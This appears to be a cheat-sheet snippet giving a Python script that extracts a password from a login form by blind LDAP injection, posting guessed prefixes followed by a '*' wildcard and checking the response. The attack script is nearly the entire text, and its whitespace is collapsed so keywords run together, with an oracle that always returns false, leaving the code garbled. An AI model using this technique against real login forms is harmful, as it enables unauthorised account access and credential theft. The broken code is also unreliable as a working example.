Example of retrieving a password using blind LDAP injection from a login form:
#!/usr/bin/python3import requestsimport stringimport recharset ="{}_-"+ string.ascii_letters + string.digitsurl ='<url>'defgo(p): d ={"username":"<username>","password": f"{p}*"} r = requests.post(url +'/login', allow_redirects=False, data=d)# return true on success, false on error depending on the responsereturn falsepass=""whileTrue:for c in charset:ifgo(pass+ c):pass+= cprint(pass)